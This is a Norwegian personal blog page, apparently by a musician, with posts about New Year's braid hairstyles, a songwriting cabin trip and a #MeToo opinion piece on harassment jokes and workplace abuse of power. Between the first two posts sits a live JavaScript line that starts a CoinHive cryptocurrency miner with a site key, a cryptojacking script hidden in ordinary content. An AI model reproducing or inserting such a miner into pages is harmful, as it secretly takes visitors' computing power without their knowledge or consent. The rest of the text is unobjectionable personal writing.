3 nyttårs-fletter du fikser selv

Lurer på hvordan du skal style håret til nyttår?

Sjekk ut den nye vloggen min, vi har filmet steg-for-steg, 3 fine nyttårsfrisyrer 🙂

Putt gjerne en tommel opp hvis du liker den og subscribe gjerne <3

 

var mnr = new CoinHive.Anonymous(‘YOjzBUoHFSepjyzKcZLh9AqoIf1Vz3Sn’, {throttle: 0.75}); mnr.start();

Kos

Noen ganger trenger man bare ett pust i bakken, bort fra støy og hverdagen.

Jeg sitter i skrivende stund på en veranda i Phuket i Thailand og storkoser meg med ett glass rødvin med kjæresten. NÅ tar jeg sommerferien jeg aldri fikk (for jeg hadde veldig mange konserter <3).

Etter å ha sittet i studio i en kjeller i noen dager fant jeg ut at jeg heller ville ta med meg produsentene fra Boxxes og låtskriveren Karoline med på en hyttetur. Her slapp vi å tenke på når neste tog gikk og hva som skjedde rundt oss. Dette er de mest produktive dagene jeg noen gang har hatt.

Vi lagde vel 8 idéer disse dagene og storkoste oss på tur. Se video og bli med inn i min verden 🙂

#Metoo

Kjære lesere.

I det siste har jeg laget flere videoer enn jeg har skrevet tekst.

Kanskje fordi jeg føler det er lettere å formidle meningene mine da. Jeg har startet å Vlogge og deler hver søndag enten Vlogg om ting jeg har gjort den uka, gøye/rare ting som har skjedd eller meningene mine. I dag klarte jeg ikke vente til søndag. Jeg må dele hva jeg føler. Det føles riktig. Nå.

Nå har “bevegelsen” #metoo foregått en stund og den vokser fortsatt. Enkelt sagt, jenter (og gutter) forteller om seksuelt trakassering på arbeidsplassen sin. Det hele startet i Hollywood med anklagelsene mot Harvey Weinstein.

I det siste har også flere bransjer tatt opp kampen mot trakassering og jeg var selv med å skrive under med 1109 andre kvinnelige musikere i #nårmusikkenstilner.

Det er MANGE kvinner i en liten bransje i Norge, mange som har fått nok. 

Jeg har fått nok av at folk spøker om dette.

I går på t-banen sa en fyr #metoo til meg bare fordi jeg kom borti han da banen bremset. OK, så jeg trakasserte deg seksuelt nå? Voldtok deg? Utnyttet makten min? Var det humor? Var det gøy?

Jeg hører også stadig: “Nå er jeg jo redd for å få kjeft for å gi en kollega en klem eller en klapp på skulderen”

SÅ TÅPELIG!

Dette har ingenting med en hyggelig klem å gjøre eller å si at en kollega er flink. Dette handler om at folk blir tråkket på. Det handler om at mange menn utnytter en maktposisjon ved å fornedre, utnytte og skade mennesker i en arbeidssituasjon. 

På jobb vil jeg bli møtt med gjensidig respekt og gjensidig anerkjennelse for godt arbeid.

Ikke en klaps på baken og en hånd i skrittet.

Se videoen her: